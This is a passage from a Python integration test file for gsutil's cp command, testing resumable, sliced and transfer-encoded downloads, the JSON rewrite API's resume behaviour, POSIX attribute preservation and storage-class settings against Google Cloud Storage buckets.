trackerfile_type = TrackerFileType.SLICED_DOWNLOAD
else:
trackerfile_type = TrackerFileType.DOWNLOAD
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath2),
trackerfile_type, self.test_api)
# We should have a temporary gzipped file, a tracker file, and no
# final file yet.
self.assertTrue(os.path.isfile(tracker_filename))
self.assertTrue(os.path.isfile('%s_.gztmp' % fpath2))
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath2)], return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
self.assertFalse(os.path.isfile(tracker_filename))
self.assertFalse(os.path.isfile('%s_.gztmp' % fpath2))
def _GetFaviconFile(self):
# Make a temp file from favicon.ico.gz. Finding the location of our test
# data varies depending on how/where gsutil was installed, so we get the
# data via pkgutil and use this workaround.
if not hasattr(self, 'test_data_favicon_file'):
contents = pkgutil.get_data('gslib', 'tests/test_data/favicon.ico.gz')
self.test_data_favicon_file = self.CreateTempFile(contents=contents)
return self.test_data_favicon_file
def test_cp_download_transfer_encoded(self):
"""Tests chunked transfer encoded download handling.
Tests that download works correctly with a gzipped chunked transfer-encoded
object (which therefore lacks Content-Length) of a size that gets fetched
in a single chunk (exercising downloading of objects lacking a length
response header).
"""
# Upload a file / content-encoding / content-type that triggers this flow.
# Note: We need to use the file with pre-zipped format and manually set the
# content-encoding and content-type because the Python gzip module (used by
# gsutil cp -Z) won't reproduce the bytes that trigger this problem.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, object_name='foo')
input_filename = self._GetFaviconFile()
self.RunGsUtil([
'-h', 'Content-Encoding:gzip', '-h', 'Content-Type:image/x-icon', 'cp',
suri(input_filename),
suri(object_uri)
])
# Compute the MD5 of the uncompressed bytes.
with gzip.open(input_filename) as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
in_file_md5 = hash_dict['md5'].digest()
# Downloading this file triggers the flow.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
# Compute MD5 of the downloaded (uncompressed) file, and validate it.
with open(fpath2, 'rb') as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
out_file_md5 = hash_dict['md5'].digest()
self.assertEqual(in_file_md5, out_file_md5)
@SequentialAndParallelTransfer
def test_cp_resumable_download_check_hashes_never(self):
"""Tests that resumble downloads work with check_hashes = never."""
bucket_uri = self.CreateBucket()
contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'check_hashes', 'never')]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Found no hashes to validate object downloaded', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_bucket_deleted(self):
"""Tests that a not found exception is raised if bucket no longer exists."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * 2 * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_DeleteBucketThenStartOverCopyCallbackHandler(5, bucket_uri)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True,
expected_status=1)
self.assertIn('Deleting bucket', stderr)
self.assertIn('bucket does not exist', stderr)
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download(self):
"""Tests that sliced object download works in the general case."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * ONE_KIB)
fpath = self.CreateTempFile()
# Force fast crcmod to return True to test the basic sliced download
# scenario, ensuring that if the user installs crcmod, it will work.
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'test_assume_fast_crcmod', 'True'),
('GSUtil', 'sliced_object_download_threshold', str(ONE_KIB)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), fpath])
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * ONE_KIB, 'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_unresumable_sliced_download(self):
"""Tests sliced download works when resumability is disabled."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# No tracker files should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Perform the entire download, without resuming.
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume(self):
"""Tests that sliced object download is resumable."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_partial_resume(self):
"""Test sliced download resumability when some components are finished."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltOneComponentCopyCallbackHandler(5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Download already complete', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume_content_differs(self):
"""Tests differing file contents are detected by sliced downloads."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile(contents=b'')
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
with open(fpath + '_.gstmp', 'r+b') as f:
f.write(b'altered file contents')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Resuming download', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
self.assertIn('HashMismatchException: crc32c', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Temporary file should have been deleted due to hash mismatch.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Final file should not exist.
self.assertFalse(os.path.isfile(fpath))
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_component_size_changed(self):
"""Tests sliced download doesn't break when the boto config changes.
If the number of components used changes cross-process, the download should
be restarted.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 4)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 2)),
('GSUtil', 'sliced_object_download_max_components', '2')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Sliced download tracker file doesn\'t match ', stderr)
self.assertIn('Restarting download from scratch', stderr)
self.assertNotIn('Resuming download', stderr)
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_disabled_cross_process(self):
"""Tests temporary files are not orphaned if sliced download is disabled.
Specifically, temporary files should be deleted when the corresponding
non-sliced download is completed.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
# Disable sliced downloads by increasing the threshold
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should have been deleted.
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_start_over_http_error(self):
for start_over_error in (
403, # If user doesn't have storage.buckets.get access to dest bucket.
404, # If the dest bucket exists, but the dest object does not.
410): # If the service tells us to restart the upload from scratch.
self.start_over_error_test_helper(start_over_error)
def start_over_error_test_helper(self, http_error_num):
bucket_uri = self.CreateBucket()
# The object contents need to be fairly large to avoid the race condition
# where the contents finish uploading before we artifically halt the copy.
rand_chars = get_random_ascii_chars(size=(ONE_MIB * 4))
fpath = self.CreateTempFile(contents=rand_chars)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
if self.test_api == ApiSelector.JSON:
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(_JSONForceHTTPErrorCopyCallbackHandler(5, 404)))
elif self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_XMLResumableUploadStartOverCopyCallbackHandler(5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True)
self.assertIn('Restarting upload of', stderr)
def test_cp_minus_c(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.RunGsUtil([
'cp', '-c',
suri(bucket_uri) + '/foo2',
suri(object_uri),
suri(bucket_uri) + '/dir/'
],
expected_status=1)
self.RunGsUtil(['stat', '%s/dir/foo' % suri(bucket_uri)], force_gsutil=True)
def test_rewrite_cp(self):
"""Tests the JSON Rewrite API."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar')
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type)
dst_obj_metadata = apitools_messages.Object(
bucket=src_obj_metadata.bucket,
name=self.MakeTempName('object'),
contentType=src_obj_metadata.contentType)
gsutil_api.CopyObject(src_obj_metadata, dst_obj_metadata)
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
def test_rewrite_cp_resume(self):
"""Tests the JSON Rewrite API, breaking and resuming via a tracker file."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file should be left over.
self.assertTrue(os.path.exists(tracker_file_name))
# Now resume. Callback ensures we didn't start over.
gsutil_api.CopyObject(
src_obj_metadata,
dst_obj_metadata,
progress_callback=EnsureRewriteResumeCallbackHandler(ONE_MIB *
2).call,
max_bytes_per_call=ONE_MIB)
# Copy completed; tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_source_changed(self):
"""Tests that Rewrite starts over when the source object has changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Overwrite the original object.
object_uri2 = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar',
prefer_json_api=True)
key2 = object_uri2.get_key()
src_obj_metadata2 = apitools_messages.Object(
name=key2.name,
bucket=key2.bucket.name,
contentType=key2.content_type,
etag=key2.etag.strip('"\''))
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the new object.
gsutil_api.CopyObject(src_obj_metadata2,
dst_obj_metadata,
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata2.bucket,
src_obj_metadata2.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_command_changed(self):
"""Tests that Rewrite starts over when the arguments changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='private',
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the same object but with different call parameters.
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='public-read',
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
new_obj_metadata = gsutil_api.GetObjectMetadata(
dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['acl', 'customerEncryption', 'md5Hash'])
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
new_obj_metadata.md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
# New object should have a public-read ACL from the second command.
found_public_acl = False
for acl_entry in new_obj_metadata.acl:
if acl_entry.entity == 'allUsers':
found_public_acl = True
self.assertTrue(found_public_acl,
'New object was not written with a public ACL.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@unittest.skipUnless(UsingCrcmodExtension(), 'Test requires fast crcmod.')
def test_cp_preserve_posix_bucket_to_dir_no_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically tests combinations of POSIX attributes in metadata that will
pass validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
TestCpMvPOSIXBucketToLocalNoErrors(self, bucket_uri, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_bucket_to_dir_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically, combinations of POSIX attributes in metadata that will fail
validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
obj = self.CreateObject(bucket_uri=bucket_uri,
object_name='obj',
contents=b'obj')
TestCpMvPOSIXBucketToLocalErrors(self, bucket_uri, obj, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preseve_posix_dir_to_bucket_no_errors(self):
"""Tests use of the -P flag with cp from a local dir to a bucket."""
bucket_uri = self.CreateBucket()
TestCpMvPOSIXLocalToBucketNoErrors(self, bucket_uri, is_cp=True)
def test_cp_minus_s_to_non_cloud_dest_fails(self):
"""Test that cp -s operations to a non-cloud destination are prevented."""
local_file = self.CreateTempFile(contents=b'foo')
dest_dir = self.CreateTempDir()
stderr = self.RunGsUtil(['cp', '-s', 'standard', local_file, dest_dir],
expected_status=1,
return_stderr=True)
self.assertIn('Cannot specify storage class for a non-cloud destination:',
stderr)
# TODO: Remove @skip annotation from this test once we upgrade to the Boto
# version that parses the storage class header for HEAD Object responses.
@SkipForXML('Need Boto version > 2.46.1')
def test_cp_specify_nondefault_storage_class(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
object2_suri = suri(object_uri) + 'bar'
# Specify storage class name as mixed case here to ensure that it
# gets normalized to uppercase (S3 would return an error otherwise), and
# that using the normalized case is accepted by each API.
nondefault_storage_class = {
's3': 'Standard_iA',
'gs': 'durable_REDUCED_availability'
}
storage_class = nondefault_storage_class[self.default_provider]
self.RunGsUtil(['cp', '-s', storage_class, suri(object_uri), object2_suri])
stdout = self.RunGsUtil(['stat', object2_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+%s' % storage_class,
flags=re.IGNORECASE)
@SkipForS3('Test uses gs-specific storage classes.')
def test_cp_sets_correct_dest_storage_class(self):
"""Tests that object storage class is set correctly with and without -s."""
# Use a non-default storage class as the default for the bucket.
bucket_uri = self.CreateBucket(storage_class='nearline')
# Ensure storage class is set correctly for a local-to-cloud copy.
local_fname = 'foo-orig'
local_fpath = self.CreateTempFile(contents=b'foo', file_name=local_fname)
foo_cloud_suri = suri(bucket_uri) + '/' + local_fname
self.RunGsUtil(['cp', '-s', 'standard', local_fpath, foo_cloud_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_cloud_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when no
# destination storage class is specified.
foo_nl_suri = suri(bucket_uri) + '/foo-nl'
self.RunGsUtil(['cp', foo_cloud_suri, foo_nl_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_nl_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+NEARLINE',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when a
# non-bucket-default storage class is specified.
foo_std_suri = suri(bucket_uri) + '/foo-std'
self.RunGsUtil(['cp', '-s', 'standard', foo_nl_suri, foo_std_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_std_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
def authorize_project_to_use_testing_kms_key(
self, key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME):
# Make sure our keyRing and cryptoKey exist.
keyring_fqn = self.kms_api.CreateKeyRing(
PopulateProjectId(None),
